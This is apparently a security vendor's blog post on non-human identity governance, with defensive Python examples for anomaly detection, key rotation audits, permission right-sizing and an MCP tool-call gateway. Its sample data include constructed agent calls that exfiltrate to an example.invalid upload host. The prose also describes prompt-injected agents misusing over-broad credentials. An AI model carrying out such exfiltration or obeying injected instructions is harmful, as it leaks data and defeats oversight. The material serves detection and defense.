Introduction
There are 144 non-human identities for every human identity in a modern automotive enterprise. That number comes from Unosecur's own research into the automotive sector, and the automotive industry is not an outlier. It is a preview. Every enterprise running cloud infrastructure, SaaS applications, and AI workloads is accumulating the same ratio at roughly the same speed: service accounts created for a migration that shipped eighteen months ago, API keys generated by a developer who left the company in Q1, OAuth tokens issued to a SaaS tool that was canceled but never disconnected, and AI agents deployed by three teams across AWS Bedrock, Google Vertex AI, and Azure OpenAI, each running under broad permissions and none of them governed.
These are non-human identities. And most enterprises have no program for them. This is not a gap that will close on its own. AI agent deployment is accelerating. Cloud environments are growing. SaaS sprawl is compounding. Every week, in enterprises that do not govern their NHIs, the attack surface expands quietly and automatically, without a single human making a deliberate decision to open the door.
This blog maps the NHI lifecycle from creation to offboarding, identifies exactly where governance fails at each stage, and explains what a functional NHI governance program actually looks like in 2026.
What is a non-human identity?
A non-human identity is any credential, token, key, or certificate that allows a machine, application, service, or automated process to authenticate and act within a system, without a human being present at the moment of execution.
The category is broader than most security teams realize. It includes:
Service accounts and directory identities (Active Directory, Okta, Google Workspace) are created to enable applications to authenticate to internal systems. Often provisioned with domain admin-level access because the developer needed it to work fast and never came back to scope it down.
API keys, static credentials issued by cloud providers, SaaS platforms, and internal services. Typically long-lived, rarely rotated, frequently hardcoded into application code. Tata Motors' 2025 breach exposed over 70TB of data because hardcoded AWS access keys were embedded in publicly accessible application code. No sophisticated exploit was required. The keys were just sitting there.
OAuth tokens are supposed to be short-lived, but are often long-lived in practice. Issued when a user or application authorizes a third-party connection. The token persists after the underlying user account is deactivated, the SaaS subscription is canceled, or the integration is rebuilt. Nobody revokes what nobody is tracking.
Certificates and secrets: TLS certificates, SSH keys, signing keys, and database connection strings stored in CI/CD pipelines, container images, and configuration files.
AI agent credentials are the newest and least-governed category. An AI agent running on AWS Bedrock, Google Vertex AI, or Azure OpenAI operates under a service identity. That identity has permissions. Those permissions are almost always broader than the agent's actual task requires, because restricting them slows the deployment that the business is prioritizing. The governance gap that existed for service accounts in 2018 is being recreated, at scale, for AI agents right now.
The ratio of NHIs to human identities is 144:1 in complex enterprise environments. In most organizations, none of those 144 are governed with the same rigor as the one human identity beside them.
Why NHIs are the fastest-growing attack vector
Three structural forces are driving NHI growth, and none of them is slowing down.
Cloud sprawl.
Every cloud resource provisioned creates at least one NHI: the IAM role that controls access to it. Multi-cloud environments multiply this. An organization running workloads across AWS, GCP, and Azure does not have one IAM environment to govern. It has three, each with its own permission model, each generating its own inventory of service accounts, roles, and access keys.
SaaS integration density.
The average enterprise runs over 130 SaaS applications. Each integration between those applications requires at least one OAuth token or service account credential. Many require several. The business team that approved the integration did not think about the credential lifecycle. The security team did not know the integration existed.
AI agent adoption.
This is the acceleration factor that changes the calculus in 2026. AI agents are not passive applications that wait for a human request. They make decisions, chain tool calls, access data sources, and execute actions autonomously, under credentials that grant them persistent access to production systems. An AI agent managing fleet telemetry at an automotive OEM is simultaneously a human-equivalent actor with credentials, a non-human identity with API access, and an autonomous decision-maker operating across multiple systems. It inherits every vulnerability from both identity categories while introducing risks that neither was designed to address.
The five recurring attack patterns in the automotive sector (supply chain identity backdoor, human credential theft, NHI and secrets sprawl, cloud IAM misconfiguration, and lateral movement on valid accounts) all involve NHIs either as the initial access vector or as the mechanism of lateral spread. CDK Global's breach brought 15,000 dealerships to a standstill because a single set of phished credentials gave attackers access to a centralized identity platform. VW's Cariad division exposed the precise GPS locations of 800,000 electric vehicle owners because of an improperly scoped cloud IAM policy, not a software vulnerability or a sophisticated exploit. Just a misconfigured machine identity permission.
The infrastructure was not broken. The access was.
The NHI lifecycle: Where governance fails at every stage
The NHI problem is not a single failure. It is a compound of small failures at every point in the credential lifecycle. Understanding where governance breaks down is the prerequisite for fixing it.
Stage 1: Creation — Where Overprivilege Starts
Most NHIs are created without a security review. A developer needs a service account to connect an application to a database. They create one, grant it the permissions required to unblock the deployment, and move on. The service account inherits far more access than the task requires because scoping it correctly would take additional time. The ticket is closed. The permission persists.
AI agents are provisioned the same way. A data science team deploys a Bedrock agent to summarise internal reports. They attach an IAM role to it. The role has read access to the S3 bucket containing the reports, but it also has write access to that bucket and access to three other buckets, all included because the role was copied from an existing template. Nobody checks. The agent goes to production.
What good governance looks like at creation: every NHI created under a defined identity policy. Minimum required permissions are scoped at the time of provisioning, not after. Every credential is tied to an owner, a purpose, a business justification, and an expiry date. AI agents are provisioned with the principle of least privilege enforced before the first deployment, not retrofitted after the first incident.
Stage 2: Active Use — The Monitoring Blind Spot
Once created, NHIs are largely unmonitored. Human identities generate login events, MFA challenges, and audit trails. NHIs operate continuously in the background without those checkpoints. A service account making 10,000 API calls per day looks identical to one making 10,001 calls, one of which is exfiltrating customer records.
This is where traditional IAM tools fail entirely. They are built for human authentication events. They do not understand the context of NHI activity, what a service account should be doing versus what it is doing, whether an AI agent's tool call sequence is legitimate or the result of a prompt injection, whether an OAuth token is being used by the intended application or by an attacker who acquired it through credential stuffing.
Unosecur's approach to the usage stage is activity-based monitoring: centralized identity logs analyzed for anomalous access patterns, with detection rules aligned to MITRE ATT&CK. When a service account that normally reads from one S3 bucket begins listing all buckets in the environment, that is T1083 (File and Directory Discovery). When an AI agent that normally summarises documents begins calling external APIs, that is T1567 (Exfiltration Over Web Service). These are detectable. They are not being detected because there is no telemetry.
What good governance looks like at usage: continuous behavioral monitoring of every NHI. Anomaly detection that understands each credential's baseline activity pattern. Centralized audit logs that correlate NHI activity across cloud providers, SaaS platforms, and on-premises systems. For AI agents specifically: tool call logging that captures not just which tool was called, but the parameters passed, the session context, and the originating user request, because without that context, the SOC cannot distinguish a legitimate action from a prompt injection executed through a trusted credential.
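The baseline-and-deviation logic described above, as an added example that is not Unosecur's code: it learns each identity's routine (service, action) pairs from a constructed set of CloudTrail-style events, flags anything new, and attaches the ATT&CK mapping the article gives for the two cases it names. The principal, service and action names are constructed.

```python
from collections import defaultdict

# Constructed CloudTrail-style events, reduced to the fields the detector needs.
# Learning window: each identity's routine activity.
LEARNING_EVENTS = [
    {"principal": "role/reports-reader", "service": "s3", "action": "GetObject", "target": "reports"},
    {"principal": "role/reports-reader", "service": "s3", "action": "GetObject", "target": "reports"},
    {"principal": "role/summarizer-agent", "service": "bedrock", "action": "InvokeModel", "target": "model"},
    {"principal": "role/summarizer-agent", "service": "s3", "action": "GetObject", "target": "reports"},
]
# Detection window: the two deviations the article describes, plus routine noise
# and a principal that was never inventoried.
DETECTION_EVENTS = [
    {"principal": "role/reports-reader", "service": "s3", "action": "GetObject", "target": "reports"},
    {"principal": "role/reports-reader", "service": "s3", "action": "ListBuckets", "target": "*"},
    {"principal": "role/summarizer-agent", "service": "external-http", "action": "POST", "target": "api.example.invalid"},
    {"principal": "role/unknown-agent", "service": "s3", "action": "GetObject", "target": "reports"},
]

# The ATT&CK mapping the article gives for its two deviations. The keys are an
# assumption about how this event feed names services and actions.
TECHNIQUE_HINTS = {
    ("s3", "ListBuckets"): "T1083 File and Directory Discovery",
    ("external-http", "POST"): "T1567 Exfiltration Over Web Service",
}


def build_baseline(events):
    """Per-principal set of (service, action) pairs seen in the learning window."""
    baseline = defaultdict(set)
    for e in events:
        baseline[e["principal"]].add((e["service"], e["action"]))
    return baseline


def detect_deviations(baseline, events):
    """Flag any (service, action) a principal has never performed before.
    A principal with no baseline at all is flagged on every event: a credential
    with no history is either brand new or was never inventoried."""
    findings = []
    for e in events:
        key = (e["service"], e["action"])
        if key in baseline.get(e["principal"], set()):
            continue
        findings.append({
            "principal": e["principal"], "service": e["service"], "action": e["action"],
            "target": e["target"],
            "technique": TECHNIQUE_HINTS.get(key, "unmapped: analyst review"),
            "reason": "no baseline for principal" if e["principal"] not in baseline else "first-seen action",
        })
    return findings


def run():
    return detect_deviations(build_baseline(LEARNING_EVENTS), DETECTION_EVENTS)


if __name__ == "__main__":
    for f in run():
        print(f"{f['principal']}: {f['service']}:{f['action']} -> {f['technique']} ({f['reason']})")
```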
Stage 3: Rotation — Policy Without Enforcement
The third stage is where most organizations have a policy but no enforcement. The policy says API keys rotate every 90 days. The enforcement is a developer manually remembering to do it. The reality is that 96% of enterprise permissions go unused, and the credentials attached to those unused permissions are almost never rotated, because the rotation process would require knowing the credentials exist.
Hardcoded secrets are the worst manifestation of this failure. Credentials embedded in source code, firmware images, CI/CD pipelines, and container images represent an invisible attack surface. Tata Motors' FleetEdge platform had AWS access keys hardcoded into publicly accessible application code. Those credentials were not in a secret manager. They were not on a rotation schedule. They were just there, waiting.
AI agent credentials compound the rotation problem. An agent created for a short-lived project often retains credentials long after the project ends. The team that built the agent has moved on. The credential is still active. Nobody has revoked it because nobody knows it exists.
What good governance looks like at rotation: automated credential rotation enforced at the platform level, not dependent on human memory. Secrets stored in a managed vault (AWS Secrets Manager, HashiCorp Vault, Azure Key Vault) with automatic rotation triggered by age or by anomaly detection. AI agent credentials are issued with short-lived tokens wherever the platform supports it. Long-lived credentials are flagged automatically and escalated for review. Rotation is verified, not just triggered: confirmed as completed without breaking the dependent application.
Stage 4: Offboarding — The Credentials Nobody Removes
Offboarding is where NHI governance fails most visibly, and where the consequences are most severe. When a human employee leaves an organization, an HR process is in place. The account is deactivated. When a service account is no longer needed, there is often no process at all. The account persists. The permissions persist. The credential persists.
VW's Cariad breach did not require an attacker to compromise a human employee. An improperly decommissioned cloud IAM configuration and a machine identity left active after its purpose was complete were sufficient to expose the data of 800,000 vehicle owners for several months. The breach did not require credential theft or exploitation of a software vulnerability. Misconfigured machine identity permissions were sufficient.
For AI agents, the offboarding problem is structural. Agents are deployed for specific use cases, a proof-of-concept, a pilot program, or a quarterly analysis run. When the use case ends, the agent is often simply stopped rather than deprovisioned. Its credentials remain valid. Its permissions remain active. If an attacker later gains access to the environment, those dormant agent credentials represent a pre-provisioned attack path with elevated access.
What good governance looks like at offboarding: automated deprovisioning triggered by inactivity detection. Any NHI with zero activity for 30 days should be flagged for review and, absent a business justification, deprovisioned. For AI agents: formal offboarding as part of the agent lifecycle policy, including credential revocation, permission cleanup, and confirmation that no downstream systems retain a dependency on the revoked credentials.
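The rotation and offboarding checks from these two stages, as an added example that is not Unosecur's code: it parses a constructed excerpt of an AWS IAM credential report and flags active access keys older than 90 days or unused for 30 days, the two thresholds the article uses. The user names, account ID and timestamps are constructed.

```python
import csv
import io
from datetime import datetime, timedelta, timezone

ROTATION_MAX_AGE = timedelta(days=90)  # the article's rotation policy
INACTIVITY_LIMIT = timedelta(days=30)  # the article's offboarding trigger
NOW = datetime(2026, 3, 1, tzinfo=timezone.utc)  # fixed clock so results are stable

# Constructed excerpt of an IAM credential report. The real report carries more
# columns (password, MFA and certificate fields); DictReader ignores extras.
SAMPLE_REPORT = """user,arn,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date,access_key_2_active,access_key_2_last_rotated,access_key_2_last_used_date
svc-migration,arn:aws:iam::111122223333:user/svc-migration,true,2024-09-01T00:00:00+00:00,2024-10-15T12:00:00+00:00,false,N/A,N/A
ci-deploy,arn:aws:iam::111122223333:user/ci-deploy,true,2026-01-20T00:00:00+00:00,2026-02-28T09:30:00+00:00,true,2025-10-01T00:00:00+00:00,N/A
agent-pilot,arn:aws:iam::111122223333:user/agent-pilot,true,2025-12-05T00:00:00+00:00,2026-01-10T00:00:00+00:00,false,N/A,N/A
reports-reader,arn:aws:iam::111122223333:user/reports-reader,false,N/A,N/A,false,N/A,N/A
"""


def parse_ts(value):
    """Report timestamps are ISO 8601 with offset; N/A, no_information and
    not_supported all mean 'no data' and come back as None."""
    if value in ("N/A", "no_information", "not_supported", ""):
        return None
    return datetime.fromisoformat(value)


def audit_credential_report(report_csv, now=NOW):
    """Flag active access keys past the rotation age and keys with no use in the
    inactivity window. A key that was never used is measured from its creation
    (last_rotated), so a forgotten second key does not escape the check."""
    findings = []
    for row in csv.DictReader(io.StringIO(report_csv)):
        for slot in ("1", "2"):
            if row[f"access_key_{slot}_active"] != "true":
                continue
            key = f"{row['user']}/access_key_{slot}"
            rotated = parse_ts(row[f"access_key_{slot}_last_rotated"])
            last_used = parse_ts(row[f"access_key_{slot}_last_used_date"])
            if rotated is None or now - rotated > ROTATION_MAX_AGE:
                findings.append({"key": key, "action": "rotate",
                                 "detail": f"older than {ROTATION_MAX_AGE.days} days"})
            reference = last_used or rotated
            if reference is not None and now - reference > INACTIVITY_LIMIT:
                findings.append({"key": key, "action": "review-deprovision",
                                 "detail": f"no use in {INACTIVITY_LIMIT.days} days"})
    return findings


def keys_needing(action, findings):
    """Sorted key identifiers that carry the given finding type."""
    return sorted(f["key"] for f in findings if f["action"] == action)


if __name__ == "__main__":
    for f in audit_credential_report(SAMPLE_REPORT):
        print(f"{f['key']}: {f['action']} ({f['detail']})")
```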
Why standard IAM tools cannot solve this
The standard IAM toolset was built for a different era. Identity governance platforms (IGA) are designed around the concept of a human identity requesting access, a manager approving it, and a periodic access review certifying that the access is still appropriate. That model assumes human decision-making at every step.
NHIs break every assumption. There is no human requesting the access; a deployment script provisions it. There is no manager certifying it; the system that created the service account lacks a manager field. The periodic access review process, conducted quarterly at most organizations, cannot keep pace with environments where new NHIs are created daily, and AI agents can acquire permissions in seconds.
Cloud IAM tools (AWS IAM, Azure RBAC, GCP IAM) provide mechanisms for controlling NHI permissions, but they do not provide the visibility layer that enables governance. They can tell you what permissions a service account has. They cannot tell you whether those permissions are appropriate, whether the service account is still in use, whether its credentials have been exposed, or whether an AI agent running under those credentials is behaving as intended.
SIEM platforms aggregate logs. They do not understand the context of NHI activity. They can tell you a credential was used. They cannot tell you whether the use was legitimate. What the market needs, and what Unosecur's Unified Identity Fabric provides, is a layer that sits across human identities, NHIs, and AI agents simultaneously, applying continuous posture management (ISPM), real-time threat detection (ITDR), and lifecycle governance (NHI Management) from a single control plane.
What functional NHI governance looks like in practice
A functional NHI governance program in 2026 has four operational components.
Discovery that Finds Everything.
You cannot govern what you cannot see. Most organizations discover NHIs the way they discover shadow IT, after a breach. A functional program requires continuous automated discovery across every environment: cloud IAM roles, SaaS OAuth connections, CI/CD pipeline secrets, container image credentials, and AI agent service identities. Unosecur's AI Agent Discovery capability extends this to the newest NHI category, building a cross-cloud inventory of every Bedrock agent, Vertex AI agent, Azure OpenAI function, and MCP-connected agent in the environment, each with its event history, effective permissions, and risk score.
Posture Management That Enforces Least Privilege Continuously.
Discovering an over-privileged service account is useful. Remediating it automatically before it becomes a breach vector is what changes the risk profile. ISPM (Identity Security Posture Management) continuously compares every NHI's assigned permissions against its actual historical activity. A service account with write access to 47 S3 buckets that has only ever read from two of them should be scoped to two. That remediation should happen automatically, or with a single approval workflow, not a six-month access review cycle.
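The permission-versus-activity comparison above, as an added example that is not Unosecur's code: it takes a constructed IAM policy covering 47 report buckets and a constructed usage set, keeps only the (action, resource) pairs actually observed, and emits the scoped-down policy. It also handles wildcard grants such as s3:*, which goes beyond the article's single case. Bucket names and usage data are constructed.

```python
import json
from collections import defaultdict
from fnmatch import fnmatchcase

# Constructed: a role copied from a template, granting three S3 actions on all
# 47 report buckets.
REPORT_BUCKETS = [f"arn:aws:s3:::reports-{i:02d}/*" for i in range(1, 48)]
ASSIGNED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Action": ["s3:GetObject", "s3:PutObject", "s3:DeleteObject"],
                   "Resource": REPORT_BUCKETS}],
}
# Constructed: observed activity, already aggregated from access logs to
# (action, bucket pattern). The account only ever read from two buckets.
OBSERVED_USAGE = {
    ("s3:GetObject", "arn:aws:s3:::reports-03/*"),
    ("s3:GetObject", "arn:aws:s3:::reports-17/*"),
}


def policy_grants(policy):
    """Flatten Allow statements into (action_pattern, resource_pattern) pairs."""
    grants = []
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow":
            continue
        actions = st["Action"] if isinstance(st["Action"], list) else [st["Action"]]
        resources = st["Resource"] if isinstance(st["Resource"], list) else [st["Resource"]]
        grants.extend((a, r) for a in actions for r in resources)
    return grants


def covered(action, resource, grant):
    """IAM-style wildcard match of a concrete action/resource against one grant."""
    return fnmatchcase(action, grant[0]) and fnmatchcase(resource, grant[1])


def right_size(policy, usage):
    """Return (least-privilege policy, unused grants).

    Only usage the current policy actually permits is kept, so an observed pair
    that no grant covers is never silently added to the new policy."""
    grants = policy_grants(policy)
    used = {(a, r) for a, r in usage if any(covered(a, r, g) for g in grants)}
    unused = [g for g in grants if not any(covered(a, r, g) for a, r in used)]
    by_action = defaultdict(list)
    for action, resource in sorted(used):
        by_action[action].append(resource)
    scoped = {"Version": "2012-10-17",
              "Statement": [{"Effect": "Allow", "Action": action, "Resource": resources}
                            for action, resources in by_action.items()]}
    return scoped, unused


if __name__ == "__main__":
    scoped, unused = right_size(ASSIGNED_POLICY, OBSERVED_USAGE)
    print(json.dumps(scoped, indent=2))
    print(f"{len(unused)} of {len(policy_grants(ASSIGNED_POLICY))} grants saw no use")
```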
Behavioral Detection That Catches Abuse In Runtime.
Even well-governed credentials get compromised. ITDR (Identity Threat Detection and Response) provides the runtime layer, monitoring every NHI's activity pattern, flagging deviations, and enabling one-click quarantine before lateral movement completes. The benchmark is five-minute MTTD/MTTR. At that response time, the blast radius of a compromised NHI is contained before the attacker reaches a second system.
Lifecycle Management With Automated Offboarding.
The rotation and offboarding stages of the NHI lifecycle should not depend on human memory. Automated rotation schedules, inactivity-triggered deprovisioning, and integrated offboarding workflows that revoke credentials when projects end or employees leave are the operational floor for any organization serious about NHI governance.
The AI Agent Governance Imperative
AI agents deserve specific treatment in any NHI governance discussion, because they are not simply another type of service account. They are autonomous decision-makers that can take actions a human operator did not explicitly authorize at the moment of execution.
When an AI agent running on AWS Bedrock processes a document and decides to call a downstream API, that is an autonomous action taken under a credential. If the credential has excessive permissions, the agent can reach systems its operators never intended it to access. If the document contains a prompt injection, the agent can be manipulated into calling those systems on behalf of an attacker. If the credential is never rotated, an attacker who acquires it, through code exposure, secrets sprawl, or lateral movement, retains persistent access to every system the agent can reach.
Unosecur's MCP Gateway adds a critical additional layer for AI agents that operate via the Model Context Protocol. Every tool call made by an MCP-connected agent passes through the gateway, where it is authenticated, authorized against the agent's defined policy, and logged. This means the SOC has full visibility into what AI agents are doing at the execution layer, not just what credentials they hold, but what actions they are taking with those credentials, in runtime, against which systems, and with what parameters.
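A minimal policy-enforcing gateway for MCP tools/call requests, as an added example that is not Unosecur's MCP Gateway: it authenticates the agent, checks the tool and its arguments against a per-agent policy, and writes the audit record the usage stage asked for (tool, parameters, session, originating user request). The tokens, policy, tool names and the -32001 error code are assumptions.

```python
import hmac
from datetime import datetime, timezone

# Constructed: bearer tokens the gateway accepts and the agent each maps to.
AGENT_TOKENS = {"tok-summarizer-001": "summarizer-agent"}

# Constructed per-agent policy: the tools an agent may call and, per tool,
# the argument values it is allowed to pass.
POLICIES = {
    "summarizer-agent": {
        "read_document": {"arg_allow": {"source": {"internal-reports"}}},
        "search_reports": {},
    },
}

AUDIT_LOG = []  # one record per tool call, allowed or denied


def authenticate(headers):
    """Map a bearer token to an agent identity using constant-time comparison."""
    presented = headers.get("Authorization", "").removeprefix("Bearer ")
    for token, agent in AGENT_TOKENS.items():
        if hmac.compare_digest(token.encode(), presented.encode()):
            return agent
    return None


def authorize(agent, tool, args):
    """Return None when the call is within policy, otherwise the denial reason."""
    policy = POLICIES.get(agent, {})
    if tool not in policy:
        return f"tool {tool!r} is not in the policy for {agent}"
    for arg, allowed in policy[tool].get("arg_allow", {}).items():
        if args.get(arg) not in allowed:
            return f"argument {arg}={args.get(arg)!r} is not permitted"
    return None


def gateway(headers, request, session):
    """Authenticate, authorize and log one JSON-RPC 2.0 tools/call request.
    Returns the JSON-RPC response; forwarding to the real tool is out of scope."""
    params = request.get("params", {})
    tool, args = params.get("name"), params.get("arguments", {})
    agent = authenticate(headers)
    if agent is None:
        reason = "unauthenticated"
    elif request.get("method") != "tools/call":
        reason = f"method {request.get('method')!r} is not a tool call"
    else:
        reason = authorize(agent, tool, args)
    AUDIT_LOG.append({"ts": datetime.now(timezone.utc).isoformat(), "agent": agent,
                      "session": session["id"], "user_request": session["user_request"],
                      "tool": tool, "arguments": args,
                      "decision": "deny" if reason else "allow", "reason": reason})
    if reason:  # -32001 sits in the JSON-RPC server-error range; our choice, not MCP-mandated
        return {"jsonrpc": "2.0", "id": request.get("id"),
                "error": {"code": -32001, "message": "Forbidden by gateway policy", "data": reason}}
    return {"jsonrpc": "2.0", "id": request.get("id"), "result": {"forwarded": True, "tool": tool}}


# Constructed session and requests: a legitimate read, then a call to a tool the
# agent was never granted (the pattern the article describes for an injected document).
SESSION = {"id": "sess-42", "user_request": "summarise last quarter's fleet reports"}
HEADERS = {"Authorization": "Bearer tok-summarizer-001"}
LEGIT = {"jsonrpc": "2.0", "id": 1, "method": "tools/call",
         "params": {"name": "read_document", "arguments": {"source": "internal-reports", "doc": "q4.pdf"}}}
INJECTED = {"jsonrpc": "2.0", "id": 2, "method": "tools/call",
            "params": {"name": "send_http", "arguments": {"url": "https://example.invalid/upload"}}}
```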
The organizations that will build secure AI programs in 2026 are those that govern AI agent identities before the agents go to production, not after the first incident forces the question.
Starting Points for IAM Leads and CISOs
If an NHI governance program does not exist at your organization today, three actions provide the most immediate risk reduction:
Build The Inventory First.
You cannot prioritize what you cannot count. Run a discovery scan across your cloud environments, SaaS connections, and CI/CD systems. Count the NHIs. Categorize them by type and by the sensitivity of the systems they access. The number will be larger than your team expects. That is the starting point, not a reason to delay.
Apply Immediate Remediation To The Highest-Risk Credentials.
Service accounts with domain admin access. API keys embedded in source code repositories. OAuth tokens tied to deactivated user accounts. AI agents with write access to production data stores. These are not edge cases in most enterprise environments. They are the norm. Remediate the highest-risk items first, then build the program around preventing recurrence.
Instrument the AI Agent Deployment Process Before It Scales Further.
Every new AI agent should be provisioned under a defined identity policy that includes minimum required permissions, a named owner, a documented purpose, a rotation schedule, and an offboarding trigger. If that governance does not exist today, the time to build it is before the next agent deployment, not after the next breach.
The 144:1 ratio is not a statistic from an outlier industry. It is a preview of where every enterprise is heading. The organizations that treat non-human identity governance as a core security program, not an IAM hygiene item, will be the ones that can deploy AI at scale without the incident that forces the board to ask why nobody was watching the machines.
How Unosecur Solves Non-Human Identity Governance
Unosecur's Unified Identity Fabric brings every identity (human, non-human, and AI agent) into a single operational view, covering ownership, permissions, activity, and access paths. Tenant provisioning takes 15 minutes, with findings surfacing at runtime.
Discovery Across Every Layer
Unosecur inventories every service account, API key, OAuth token, workload identity, and AI agent credential across cloud, SaaS, on-prem, and identity providers, continuously, without replacing existing tools.
Posture And Right-Sizing
Compares granted permissions against actual usage and recommends activity-based reductions, generating least-privilege policies as cloud-native templates that engineering can apply directly.
Runtime Threat Detection
Tracks how each NHI and AI agent normally behaves and flags meaningful deviations the moment they happen, with containment running human-in-the-loop.
AI Agent Governance
The MCP Auth Gateway enforces identity and authorization at the protocol layer for every agent tool call, making AI agents a controlled, auditable layer of the environment.
Conclusion
Non-human identities are growing faster than most security programs can keep up with. Every cloud service, SaaS integration, and AI agent introduces new credentials that require continuous visibility and governance. Without a structured approach, these identities become an expanding attack surface that traditional IAM tools were never designed to address.
The organizations that succeed with AI and cloud adoption will be those that govern non-human identities from creation to retirement, not after an incident. Book a demo with Unosecur to discover every non-human identity, enforce least privilege, monitor runtime activity, and secure the complete identity lifecycle from a single platform.
To see every non-human identity in your environment, book a demo with the Unosecur team.